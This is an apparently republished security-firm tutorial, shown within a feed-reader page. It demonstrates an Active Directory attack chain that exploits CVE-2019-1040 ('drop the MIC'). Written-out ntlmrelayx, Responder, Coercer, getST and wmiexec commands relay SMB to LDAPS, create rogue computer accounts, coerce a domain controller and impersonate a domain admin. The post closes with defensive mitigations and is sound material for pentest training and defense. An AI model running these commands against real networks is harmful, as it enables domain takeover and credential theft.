惯性聚合 高效追踪和阅读你感兴趣的博客、新闻、科技资讯
阅读原文 在惯性聚合中打开

推荐订阅源

N
News and Events Feed by Topic
让小产品的独立变现更简单 - ezindie.com
让小产品的独立变现更简单 - ezindie.com
月光博客
月光博客
freeCodeCamp Programming Tutorials: Python, JavaScript, Git & More
大猫的无限游戏
大猫的无限游戏
T
Tailwind CSS Blog
S
SegmentFault 最新的问题
V
V2EX
阮一峰的网络日志
阮一峰的网络日志
C
Cisco Blogs
博客园 - 叶小钗
P
Privacy International News Feed
Jina AI
Jina AI
Apple Machine Learning Research
Apple Machine Learning Research
T
Threatpost
IT之家
IT之家
博客园 - 聂微东
Know Your Adversary
Know Your Adversary
Help Net Security
Help Net Security
罗磊的独立博客
I
Intezer
S
Schneier on Security
博客园_首页
C
CERT Recently Published Vulnerability Notes
雷峰网
雷峰网
Cisco Talos Blog
Cisco Talos Blog
宝玉的分享
宝玉的分享
cs.CV updates on arXiv.org
cs.CV updates on arXiv.org
Webroot Blog
Webroot Blog
TaoSecurity Blog
TaoSecurity Blog
MyScale Blog
MyScale Blog
P
Privacy & Cybersecurity Law Blog
T
The Exploit Database - CXSecurity.com
PCI Perspectives
PCI Perspectives
Security Latest
Security Latest
H
Heimdal Security Blog
S
Secure Thoughts
Hacker News: Ask HN
Hacker News: Ask HN
Y
Y Combinator Blog
cs.CL updates on arXiv.org
cs.CL updates on arXiv.org
Microsoft Security Blog
Microsoft Security Blog
cs.AI updates on arXiv.org
cs.AI updates on arXiv.org
SecWiki News
SecWiki News
The GitHub Blog
The GitHub Blog
A
Arctic Wolf
A
About on SuperTechFans
aimingoo的专栏
aimingoo的专栏
T
Threat Research - Cisco Blogs
Engineering at Meta
Engineering at Meta
Cyber Security Advisories - MS-ISAC
Cyber Security Advisories - MS-ISAC

Black Hills Information Security, Inc.

Bad Habits: An ANTISOC Operation Same Problem, Different Angles: When Red Team and Blue Team Actually Talk to Each Other How to Identify and Exploit New Vulnerabilities Swapper – A Pure Regex Match/Replace Burp Extension A Practical Guide to BloodHound Data Collection Network Engineering Basics Signed, Trusted, and Abused: Proxy Execution via WebView2 Getting Started In Pentesting – Advice From The BHIS Pentest Lead Cloud Security: Tips and Resources for Securing the Cloud Lessons From A Chatbot Incident How to Lead Effective Tabletops Understanding GRC: How to Navigate Risks and Compliance Standards The “P” in PAM is for Persistence: Linux Persistence Technique Malware Analysis: How to Analyze and Understand Malware OSINT: How to Find, Use, and Control Open-Source Intelligence What to Do with Your First Home Lab When the SOC Goes to Deadwood: A Night to Remember Social Engineering and Microsoft SSPR: The Road to Pwnage is Paved with Good Intentions Common Cyber Threats Finding the Right Penetration Testing Company Deceptive-Auditing: An Active Directory Honeypots Tool The Curious Case of the Comburglar How to Set Smart Goals (That Actually Work For You) Inside the BHIS SOC: A Conversation with Hayden Covington Abusing Delegation with Impacket (Part 3): Resource-Based Constrained Delegation Why You Got Hacked – 2025 Super Edition Abusing Delegation with Impacket (Part 2): Constrained Delegation Abusing Delegation with Impacket (Part 1): Unconstrained Delegation GoSpoof – Turning Attacks into Intel Model Context Protocol (MCP) Bypassing WAFs Using Oversized Requests Getting Started with AI Hacking Part 2: Prompt Injection Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 2) DomCat: A Domain Categorization Tool Wrangling Windows Event Logs with Hayabusa & SOF-ELK (Part 1) Microsoft Store and WinGet: Security Risks for Corporate Environments Default Web Content MailFail Commonly Abused Administrative Utilities: A Hidden Risk to Enterprise Security Stop Spoofing Yourself! Disabling M365 Direct Send Bypassing CSP with JSONP: Introducing JSONPeek and CSP B Gone Offensive Tooling Cheatsheets: An Infosec Survival Guide Resource DNS Triage Cheatsheet GraphRunner Cheatsheet Burp Suite Cheatsheet Impacket Cheatsheet Wireshark Cheatsheet Hashcat Cheatsheet EyeWitness Cheatsheet Nmap Cheatsheet Netcat (nc) Cheatsheet Hunt for Weak Spots in Your Wireless Network with Airodump-ng from the Aircrack-ng Suite Detecting ADCS Privilege Escalation Vulnerability Scanning with Nmap Getting Started with NetExec: Streamlining Network Discovery and Access How to Use Dirsearch Augmenting Penetration Testing Methodology with Artificial Intelligence – Part 3: Arcanum Cyber Security Bot How to Design and Execute Effective Social Engineering Attacks by Phone Abusing S4U2Self for Active Directory Pivoting Why Use a Macro Pad? Espanso: Text Replacement, the Easy Way Caging Copilot: Lessons Learned in LLM Security Augmenting Penetration Testing Methodology with Artificial Intelligence – Part 2: Copilot Augmenting Penetration Testing Methodology with Artificial Intelligence – Part 1: Burpference Intercepting Traffic for Mobile Applications that Bypass the System Proxy How to Root Android Phones Communicating Security to the C-Suite: A Strategic Approach Offline Memory Forensics With Volatility Getting Started with AI Hacking: Part 1 Go-Spoof: A Tool for Cyber Deception How to Test Adversary-in-the-Middle Without Hacking Tools Canary in the Code: Alert()-ing on XSS Exploits How to Hack Wi-Fi with No Wi-Fi Why Your Org Needs a Penetration Test Program Burp Suite Extension: Copy For Light at the End of the Dark Web Wi-Fi Forge: Practice Wi-Fi Security Without Hardware Avoiding Dirty RAGs: Retrieval-Augmented Generation with Ollama and LangChain Gone Phishing: Installing GoPhish and Creating a Campaign 5 Things We Are Going to Continue to Ignore in 2025 John Strand’s 5 Phase Plan For Starting in Computer Security Questions From a Beginner Threat Hunter GRC for Security Managers: From Checklists to Influence AI Large Language Models and Supervised Fine Tuning Attack Tactics 9: Shadow Creds for PrivEsc w/ Kent & Jordan One Active Directory Account Can Be Your Best Early Warning Introduction to Zeek Log Analysis Indecent Exposure: Your Secrets are Showing Creating Burp Extensions: A Beginner’s Guide Pitting AI Against AI: Using PyRIT to Assess Large Language Models (LLMs) The Top Ten List of Why You Got Hacked This Year (2023/2024) ICS Hard Knocks: Mitigations to Scenarios Found in ICS/OT Backdoors & Breaches Intro to Data Analytics Using SQL Finding Access Control Vulnerabilities with Autorize The Detection Engineering Process Cyber Risk Lessons We Can Learn From Hurricane Preparedness Intro to Desktop Application Testing Methodology What Is Penetration Testing? Adversary in the Middle (AitM): Post-Exploitation Pentesting, Threat Hunting, and SOC: An Overview
Bypass NTLM Message Integrity Check – Drop the MIC
BHIS · 2024-02-02 · via Black Hills Information Security, Inc.

In An SMB Relay Race – How To Exploit LLMNR and SMB Message Signing for Fun and Profit, Jordan Drysdale1 shared the dangers of lack of SMB Signing requirements and demonstrated an attack path which can allow an attacker to escalate from zero to Domain Admin (DA) in an Active Directory environment. In this article, we will build off the SMB relay techniques discussed in that blog post and demonstrate an SMB to LDAP(S) relay attack.

Background

Machine Account Quota

The domain attribute used to determine how many computers a user can join to the domain is called ms-ds-machineaccountquota.2 By default, any authenticated domain user can join up to 10 computers to an Active Directory domain. Joining a computer to the domain creates a domain object (computer object).

PowerShell Get Machine Account Quota

This configuration can be dangerous. Joining a computer to the domain should require approval from an administrator and an organization should have processes in place to ensure that domain computers have the standard security configurations, group policies, endpoint protection applied. Additionally, the process should update the organization’s device inventory.

Message Integrity

Imagine we have gained a foothold in the target organization Foobar’s environment. LDAP is only available on domain controllers. Therefore, we must target a domain controller in an LDAP relay attack. We have performed some basic reconnaissance and located the target domain controller DC01.foobar.com (10.10.10.1).

We can set up an LDAP relay targeting the discovered domain controller using the following Impacket3 ntlmrelayx.py arguments:

  • -t: Target to relay the credentials to
  • -wh: Enable serving a WPAD file for Proxy Authentication attack, setting the proxy host
  • --add-computer – create domain computer object
  • -smb2support – SMB version 2 support

The full command:

ntlmrelayx.py \
  -t ldaps://10.10.10.1 \
  -wh [email protected] \
  -smb2support

As demonstrated in the figure below, we received a connection via SMB. However, attempting to relay SMB to LDAP resulted in the following error: “[!] The client requested signing. Relaying to LDAP will not work!  (This usually happens when relaying from SMB to LDAP).”

SMB to LDAP Connection Failed

This behavior is expected. Typically, SMB traffic cannot be relayed to LDAP(S). NTLM authentication consists of three message types: NTLM_NEGOTIATE, NTLM_CHALLENGE, and NTLM_AUTHENTICATE. A field known as the Message Integrity Code was added to the NTLM_AUTHENTICATE message to prevent message tampering.

A vulnerability was published in 2019 revealing a flaw that allowed an attacker to bypass the NTLM Message Integrity Check (MIC).4 This issue is known as the “drop the MIC” vulnerability and allows an attacker machine-in-the-middle position to tamper with the NTLM authentication by removing the integrity check. When MIC is not included, the connection from SMB can be relayed to LDAPS.

Exploiting CVE-2019-1040

Once again, let’s imagine we have gained a foothold in the target organization Foobar’s environment. At this point, we have network level access, and we located the target domain controller DC01.foobar.com (10.10.10.1).

To provide a brief initial attack summary:

  1. Configure NTLMRelayx to relay NTLM authentication to the target the domain controller and remove message integrity
  2. Configure Responder poisoner with SMB and HTTP servers disabled
  3. Wait for incoming credentials

We can exploit systems vulnerable to CVE-2019-10405 and relay SMB connections to LDAPS by adding the --remove-mic flag to our Impacket command. Assuming the target domain has the default machine account quota or a policy greater than zero, we can use the --add-computer flag to create a computer object. If the attack is successful, a computer object with the name “snowmachine2$” would be added to the target domain.

The full command is shown below.

ntlmrelayx.py \
  -t ldaps://10.10.10.1 \
  -wh [email protected] \
  --add-computer 'snowmachine2' <PASSWORD>\
  --remove-mic \
  -smb2support

Next, we will configure Responder to poison LLMNR and NetBIOS traffic and automatically pass the NTLM authentication to our Impacket relay by turning the SMB and HTTP servers off. To turn off the Responder servers, we must edit the Responder.conf file:

Responder Configuration

As shown in the figure below, the relay attack was successful. Credentials for a low privileged user account named FOOBAR/bspears were relayed over LDAPS to create the computer object snowmachine2$.

Create Domain Computer Object

We have effectively escalated from network access to domain account access. We can test our computer account credentials using CrackMapExec6 and query the ms-ds-machineaccountquota.

crackmapexec ldap DC01.foobar.com -u snowmachine2$ -p REDACTED -M MAQ

Authenticate as Snowmachine2$ and Get MAQ

We can use these domain credentials to enumerate domain information and explore paths of privilege escalation.

Domain Takeover

If we have two domain controllers, and at least one domain controller can be coerced to authenticate to our attacker machine, we can expand upon this attack by relaying credentials from one domain controller to another and creating a computer object with delegation rights to a domain controller.

Scenario Details:

  • Domain Controller 1: DC01.foobar.com (10.10.10.1)
  • Domain Controller 2: DC02.foobar.com (10.10.10.22)
  • Attacker Machine: 10.10.10.200
  • Owned User: snowmachine2$ (can use any domain user account)
  • Known Domain Administrator Account: DA_Dan

We can elevate privileges from a standard domain computer account (snowmachine2$) to a domain administrator account by following the procedure outlined below:

  1. Coerce domain controller DC02 (10.10.10.22) to authenticate to our attacker machine.
  2. Relay the hash obtained from the domain controller to LDAPS on target domain controller DC01 (10.10.10.1) and create another domain object with delegation rights to DC02.
  3. Use the new computer object to request a service ticket on behalf of the domain administrator (DA_Dan) to impersonate the domain administrator.

By adding the --delegate-access flag to our ntlmrelayx.py command, we can tell ntlmrelayx to create a computer object with delegation access to the relayed account.:

ntlmrelayx.py
  -t ldaps://DC01.foobar.com \
  -wh bhispad \
  --add-computer 'DcMachine' <PASSWORD>\
  --delegate-access\
  --remove-mic \
  -smb2support

Coercer7 is a python tool used to coerce Windows machines to authenticate to an attacker machine by abusing various vulnerable RPC functions.

Using the domain credentials obtained from our new computer account snowmachine2$, we can use Coercer to force the victim machine (DC02) to authenticate to the attacker host (10.10.10.200).

**Side Note: In some cases, a relay attack may not require domain credentials. For example, if the victim host is not patched against CVE-2021-36942.8**

The Coercer arguments required are as follows:

-u - Domain Username
-p - Password for User 
-d - Target Domain
-l - Listener IP (Our Relay)
-t - Target

The complete Coercer command is shown below.

coercer coerce \
  -u snowmachine2$ \
  -p REDACTED \
  -d foobar.com \
  -l 10.10.10.200 \
  -t DC02.foobar.com

The Coercer response shown below [+] (ERROR_BAD_NETPATH) indicated that the coercion was successful.

Coerce Domain Controller DC02

As shown in the figure below, we successfully created a computer object with Delegation Rights to DC02.

Create Domain Computer

Our new computer account, DcMachine$ was created with privileges that allow the account to impersonate any user on the domain controller DC02, essentially any domain account including a Domain Admin.

Let’s demonstrate this by impersonating the domain admin DA_Dan. To impersonate the domain admin, we will use Impacket’s getST module to request a Kerberos ticket on behalf of DA_Dan.

getST.py -spn 'cifs/DC02.foobar.come' \
  'foobar.com/DcMachine$' \
  -impersonate 'DA_Dan' \
  -dc-ip 10.10.10.1 
export KRB5CCNAME=DA_Dan.ccache
Get Service Ticket for DA_Dan

Using the Kerberos authentication, we can establish an interactive shell on DC02 impersonating the domain admin DA_Dan.

wmiexec.py -k -no-pass FOOBAR.COM/'DA_Dan'@DC02.foobar.com
Impersonate Domain Administrator DA_Dan
Domain Administrator DA_Dan

To summarize, we successfully escalate privileges from network access to domain administrator via two relay attacks. Each attack relayed an incoming SMB connection to an LDAPS connection, which was possible because the target systems were not patched against CVE-2019-1040.

The first attack allowed us to gain our initial set of domain account credentials by relaying SMB connections to LDAPS.

Next, we elevated privileges from a standard domain computer account to a domain administrator account via a second relay attack which involved coercing a domain controller to authenticate to our attacker machine and creating another computer object with delegation rights to the domain controller.

So, How Do We Prevent & Detect Such Attacks?

Weak Active Directory Object Creation:

  • Configure notifications to key personnel when new domain objects are added
  • Ensure all newly added computer objects are placed in the proper OU and appropriate Group Policies are applied
  • Update the organization’s authorized device inventory when a new computer joined the domain
  • Review the MS-DS-MachineAccountQuota attribute and disallow non-administrative computer joins to the domain

Network Poisoning and Relay Attacks:

  • Enable SMB Signing on all systems
  • Disable LLMNR on all clients via Group Policy Object (GPO)
  • Disable NetBIOS Name Server (NBNS)
  • Disable the Proxy Auto detection via Group Policy
  • Disable NTLM
  • Ensure all systems are patched against CVE-2019-1040
  • Implement detections for malicious RPC calls and consider implementing RPCFirewall

Additional Resources

References

  1. https://twitter.com/Rev10D ↩︎
  2. https://learn.microsoft.com/en-us/windows/win32/adschema/a-ms-ds-machineaccountquota ↩︎
  3. https://github.com/fortra/impacket ↩︎
  4. https://github.com/advisories/GHSA-8vpr-83m7-3f7q ↩︎
  5. https://nvd.nist.gov/vuln/detail/CVE-2019-1040 ↩︎
  6. https://github.com/byt3bl33d3r/CrackMapExec ↩︎
  7. https://github.com/p0dalirius/Coercer ↩︎
  8. https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36942 ↩︎


Ready to learn more?

Level up your skills with affordable classes from Antisyphon!

Pay-What-You-Can Training

Available live/virtual and on-demand